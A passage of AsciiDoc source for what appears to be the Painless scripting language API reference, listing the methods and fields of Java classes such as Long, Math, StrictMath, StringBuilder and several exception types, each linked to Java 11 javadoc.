{java11-javadoc}/java.base/java/lang/Integer.html#compareTo(java.lang.Integer)[compareTo](Integer) -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-InterruptedException]] -==== InterruptedException -* {java11-javadoc}/java.base/java/lang/InterruptedException.html#()[InterruptedException]() -* {java11-javadoc}/java.base/java/lang/InterruptedException.html#(java.lang.String)[InterruptedException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Iterable]] -==== Iterable -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* Spliterator {java11-javadoc}/java.base/java/lang/Iterable.html#spliterator()[spliterator]() -* double sum() -* double sum(ToDoubleFunction) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Long]] -==== Long -* static int {java11-javadoc}/java.base/java/lang/Long.html#BYTES[BYTES] -* static long {java11-javadoc}/java.base/java/lang/Long.html#MAX_VALUE[MAX_VALUE] -* static long {java11-javadoc}/java.base/java/lang/Long.html#MIN_VALUE[MIN_VALUE] -* static int {java11-javadoc}/java.base/java/lang/Long.html#SIZE[SIZE] -* static int {java11-javadoc}/java.base/java/lang/Long.html#bitCount(long)[bitCount](long) -* static int {java11-javadoc}/java.base/java/lang/Long.html#compare(long,long)[compare](long, long) -* static int {java11-javadoc}/java.base/java/lang/Long.html#compareUnsigned(long,long)[compareUnsigned](long, long) -* static Long {java11-javadoc}/java.base/java/lang/Long.html#decode(java.lang.String)[decode](null) -* static long {java11-javadoc}/java.base/java/lang/Long.html#divideUnsigned(long,long)[divideUnsigned](long, long) -* static int {java11-javadoc}/java.base/java/lang/Long.html#hashCode(long)[hashCode](long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#highestOneBit(long)[highestOneBit](long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#lowestOneBit(long)[lowestOneBit](long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#max(long,long)[max](long, long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#min(long,long)[min](long, long) -* static int {java11-javadoc}/java.base/java/lang/Long.html#numberOfLeadingZeros(long)[numberOfLeadingZeros](long) -* static int {java11-javadoc}/java.base/java/lang/Long.html#numberOfTrailingZeros(long)[numberOfTrailingZeros](long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#parseLong(java.lang.String)[parseLong](null) -* static long {java11-javadoc}/java.base/java/lang/Long.html#parseLong(java.lang.String,int)[parseLong](null, int) -* static long {java11-javadoc}/java.base/java/lang/Long.html#parseUnsignedLong(java.lang.String)[parseUnsignedLong](null) -* static long {java11-javadoc}/java.base/java/lang/Long.html#parseUnsignedLong(java.lang.String,int)[parseUnsignedLong](null, int) -* static long {java11-javadoc}/java.base/java/lang/Long.html#remainderUnsigned(long,long)[remainderUnsigned](long, long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#reverse(long)[reverse](long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#reverseBytes(long)[reverseBytes](long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#rotateLeft(long,int)[rotateLeft](long, int) -* static long {java11-javadoc}/java.base/java/lang/Long.html#rotateRight(long,int)[rotateRight](long, int) -* static int {java11-javadoc}/java.base/java/lang/Long.html#signum(long)[signum](long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#sum(long,long)[sum](long, long) -* static null {java11-javadoc}/java.base/java/lang/Long.html#toBinaryString(long)[toBinaryString](long) -* static null {java11-javadoc}/java.base/java/lang/Long.html#toHexString(long)[toHexString](long) -* static null {java11-javadoc}/java.base/java/lang/Long.html#toOctalString(long)[toOctalString](long) -* static null {java11-javadoc}/java.base/java/lang/Long.html#toString(long)[toString](long) -* static null {java11-javadoc}/java.base/java/lang/Long.html#toString(long,int)[toString](long, int) -* static null {java11-javadoc}/java.base/java/lang/Long.html#toUnsignedString(long)[toUnsignedString](long) -* static null {java11-javadoc}/java.base/java/lang/Long.html#toUnsignedString(long,int)[toUnsignedString](long, int) -* static Long {java11-javadoc}/java.base/java/lang/Long.html#valueOf(long)[valueOf](long) -* static Long {java11-javadoc}/java.base/java/lang/Long.html#valueOf(java.lang.String,int)[valueOf](null, int) -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* int {java11-javadoc}/java.base/java/lang/Long.html#compareTo(java.lang.Long)[compareTo](Long) -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Math]] -==== Math -* static double {java11-javadoc}/java.base/java/lang/Math.html#E[E] -* static double {java11-javadoc}/java.base/java/lang/Math.html#PI[PI] -* static double {java11-javadoc}/java.base/java/lang/Math.html#IEEEremainder(double,double)[IEEEremainder](double, double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#abs(double)[abs](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#acos(double)[acos](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#asin(double)[asin](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#atan(double)[atan](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#atan2(double,double)[atan2](double, double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#cbrt(double)[cbrt](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#ceil(double)[ceil](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#copySign(double,double)[copySign](double, double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#cos(double)[cos](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#cosh(double)[cosh](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#exp(double)[exp](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#expm1(double)[expm1](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#floor(double)[floor](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#hypot(double,double)[hypot](double, double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#log(double)[log](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#log10(double)[log10](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#log1p(double)[log1p](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#max(double,double)[max](double, double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#min(double,double)[min](double, double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#nextAfter(double,double)[nextAfter](double, double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#nextDown(double)[nextDown](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#nextUp(double)[nextUp](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#pow(double,double)[pow](double, double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#random()[random]() -* static double {java11-javadoc}/java.base/java/lang/Math.html#rint(double)[rint](double) -* static long {java11-javadoc}/java.base/java/lang/Math.html#round(double)[round](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#scalb(double,int)[scalb](double, int) -* static double {java11-javadoc}/java.base/java/lang/Math.html#signum(double)[signum](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#sin(double)[sin](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#sinh(double)[sinh](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#sqrt(double)[sqrt](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#tan(double)[tan](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#tanh(double)[tanh](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#toDegrees(double)[toDegrees](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#toRadians(double)[toRadians](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#ulp(double)[ulp](double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NegativeArraySizeException]] -==== NegativeArraySizeException -* {java11-javadoc}/java.base/java/lang/NegativeArraySizeException.html#()[NegativeArraySizeException]() -* {java11-javadoc}/java.base/java/lang/NegativeArraySizeException.html#(java.lang.String)[NegativeArraySizeException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NoSuchFieldException]] -==== NoSuchFieldException -* {java11-javadoc}/java.base/java/lang/NoSuchFieldException.html#()[NoSuchFieldException]() -* {java11-javadoc}/java.base/java/lang/NoSuchFieldException.html#(java.lang.String)[NoSuchFieldException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NoSuchMethodException]] -==== NoSuchMethodException -* {java11-javadoc}/java.base/java/lang/NoSuchMethodException.html#()[NoSuchMethodException]() -* {java11-javadoc}/java.base/java/lang/NoSuchMethodException.html#(java.lang.String)[NoSuchMethodException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NullPointerException]] -==== NullPointerException -* {java11-javadoc}/java.base/java/lang/NullPointerException.html#()[NullPointerException]() -* {java11-javadoc}/java.base/java/lang/NullPointerException.html#(java.lang.String)[NullPointerException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Number]] -==== Number -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NumberFormatException]] -==== NumberFormatException -* {java11-javadoc}/java.base/java/lang/NumberFormatException.html#()[NumberFormatException]() -* {java11-javadoc}/java.base/java/lang/NumberFormatException.html#(java.lang.String)[NumberFormatException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Object]] -==== Object -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ReflectiveOperationException]] -==== ReflectiveOperationException -* {java11-javadoc}/java.base/java/lang/ReflectiveOperationException.html#()[ReflectiveOperationException]() -* {java11-javadoc}/java.base/java/lang/ReflectiveOperationException.html#(java.lang.String)[ReflectiveOperationException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-RuntimeException]] -==== RuntimeException -* {java11-javadoc}/java.base/java/lang/RuntimeException.html#()[RuntimeException]() -* {java11-javadoc}/java.base/java/lang/RuntimeException.html#(java.lang.String)[RuntimeException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-SecurityException]] -==== SecurityException -* {java11-javadoc}/java.base/java/lang/SecurityException.html#()[SecurityException]() -* {java11-javadoc}/java.base/java/lang/SecurityException.html#(java.lang.String)[SecurityException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Short]] -==== Short -* static int {java11-javadoc}/java.base/java/lang/Short.html#BYTES[BYTES] -* static short {java11-javadoc}/java.base/java/lang/Short.html#MAX_VALUE[MAX_VALUE] -* static short {java11-javadoc}/java.base/java/lang/Short.html#MIN_VALUE[MIN_VALUE] -* static int {java11-javadoc}/java.base/java/lang/Short.html#SIZE[SIZE] -* static int {java11-javadoc}/java.base/java/lang/Short.html#compare(short,short)[compare](short, short) -* static Short {java11-javadoc}/java.base/java/lang/Short.html#decode(java.lang.String)[decode](null) -* static int {java11-javadoc}/java.base/java/lang/Short.html#hashCode(short)[hashCode](short) -* static short {java11-javadoc}/java.base/java/lang/Short.html#parseShort(java.lang.String)[parseShort](null) -* static short {java11-javadoc}/java.base/java/lang/Short.html#parseShort(java.lang.String,int)[parseShort](null, int) -* static short {java11-javadoc}/java.base/java/lang/Short.html#reverseBytes(short)[reverseBytes](short) -* static null {java11-javadoc}/java.base/java/lang/Short.html#toString(short)[toString](short) -* static int {java11-javadoc}/java.base/java/lang/Short.html#toUnsignedInt(short)[toUnsignedInt](short) -* static long {java11-javadoc}/java.base/java/lang/Short.html#toUnsignedLong(short)[toUnsignedLong](short) -* static Short {java11-javadoc}/java.base/java/lang/Short.html#valueOf(short)[valueOf](short) -* static Short {java11-javadoc}/java.base/java/lang/Short.html#valueOf(java.lang.String,int)[valueOf](null, int) -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* int {java11-javadoc}/java.base/java/lang/Short.html#compareTo(java.lang.Short)[compareTo](Short) -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-StackTraceElement]] -==== StackTraceElement -* {java11-javadoc}/java.base/java/lang/StackTraceElement.html#(java.lang.String,java.lang.String,java.lang.String,int)[StackTraceElement](null, null, null, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/StackTraceElement.html#getClassName()[getClassName]() -* null {java11-javadoc}/java.base/java/lang/StackTraceElement.html#getFileName()[getFileName]() -* int {java11-javadoc}/java.base/java/lang/StackTraceElement.html#getLineNumber()[getLineNumber]() -* null {java11-javadoc}/java.base/java/lang/StackTraceElement.html#getMethodName()[getMethodName]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/lang/StackTraceElement.html#isNativeMethod()[isNativeMethod]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-StrictMath]] -==== StrictMath -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#E[E] -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#PI[PI] -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#IEEEremainder(double,double)[IEEEremainder](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#abs(double)[abs](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#acos(double)[acos](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#asin(double)[asin](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#atan(double)[atan](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#atan2(double,double)[atan2](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#cbrt(double)[cbrt](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#ceil(double)[ceil](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#copySign(double,double)[copySign](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#cos(double)[cos](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#cosh(double)[cosh](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#exp(double)[exp](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#expm1(double)[expm1](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#floor(double)[floor](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#hypot(double,double)[hypot](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#log(double)[log](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#log10(double)[log10](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#log1p(double)[log1p](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#max(double,double)[max](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#min(double,double)[min](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#nextAfter(double,double)[nextAfter](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#nextDown(double)[nextDown](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#nextUp(double)[nextUp](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#pow(double,double)[pow](double, double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#random()[random]() -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#rint(double)[rint](double) -* static long {java11-javadoc}/java.base/java/lang/StrictMath.html#round(double)[round](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#scalb(double,int)[scalb](double, int) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#signum(double)[signum](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#sin(double)[sin](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#sinh(double)[sinh](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#sqrt(double)[sqrt](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#tan(double)[tan](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#tanh(double)[tanh](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#toDegrees(double)[toDegrees](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#toRadians(double)[toRadians](double) -* static double {java11-javadoc}/java.base/java/lang/StrictMath.html#ulp(double)[ulp](double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-StringBuffer]] -==== StringBuffer -* {java11-javadoc}/java.base/java/lang/StringBuffer.html#()[StringBuffer]() -* {java11-javadoc}/java.base/java/lang/StringBuffer.html#(java.lang.CharSequence)[StringBuffer](CharSequence) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#append(java.lang.Object)[append](def) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#append(java.lang.CharSequence,int,int)[append](CharSequence, int, int) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#appendCodePoint(int)[appendCodePoint](int) -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#capacity()[capacity]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/Comparable.html#compareTo(java.lang.Object)[compareTo](def) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#delete(int,int)[delete](int, int) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#deleteCharAt(int)[deleteCharAt](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/lang/StringBuffer.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#indexOf(java.lang.String)[indexOf](null) -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#indexOf(java.lang.String,int)[indexOf](null, int) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#insert(int,java.lang.Object)[insert](int, def) -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#lastIndexOf(java.lang.String)[lastIndexOf](null) -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#lastIndexOf(java.lang.String,int)[lastIndexOf](null, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/StringBuffer.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#replace(int,int,java.lang.String)[replace](int, int, null) -* null replaceAll(Pattern, Function) -* null replaceFirst(Pattern, Function) -* StringBuffer {java11-javadoc}/java.base/java/lang/StringBuffer.html#reverse()[reverse]() -* void {java11-javadoc}/java.base/java/lang/StringBuffer.html#setCharAt(int,char)[setCharAt](int, char) -* void {java11-javadoc}/java.base/java/lang/StringBuffer.html#setLength(int)[setLength](int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* null {java11-javadoc}/java.base/java/lang/StringBuffer.html#substring(int)[substring](int) -* null {java11-javadoc}/java.base/java/lang/StringBuffer.html#substring(int,int)[substring](int, int) -* null {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() - - -[[painless-api-reference-shared-StringBuilder]] -==== StringBuilder -* {java11-javadoc}/java.base/java/lang/StringBuilder.html#()[StringBuilder]() -* {java11-javadoc}/java.base/java/lang/StringBuilder.html#(java.lang.CharSequence)[StringBuilder](CharSequence) -* StringBuilder {java11-javadoc}/java.base/java/lang/StringBuilder.html#append(java.lang.Object)[append](def) -* StringBuilder {java11-javadoc}/java.base/java/lang/StringBuilder.html#append(java.lang.CharSequence,int,int)[append](CharSequence, int, int) -* StringBuilder {java11-javadoc}/java.base/java/lang/StringBuilder.html#appendCodePoint(int)[appendCodePoint](int) -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#capacity()[capacity]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/Comparable.html#compareTo(java.lang.Object)[compareTo](def) -* StringBuilder {java11-javadoc}/java.base/java/lang/StringBuilder.html#delete(int,int)[delete](int, int) -* StringBuilder {java11-javadoc}/java.base/java/lang/StringBuilder.html#deleteCharAt(int)[deleteCharAt](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/lang/StringBuilder.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#indexOf(java.lang.String)[indexOf](null) -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#indexOf(java.lang.String,int)[indexOf](null, int) -* StringBuilder {java11-javadoc}/java.base/java/lang/StringBuilder.html#insert(int,java.lang.Object)[insert](int, def) -* int 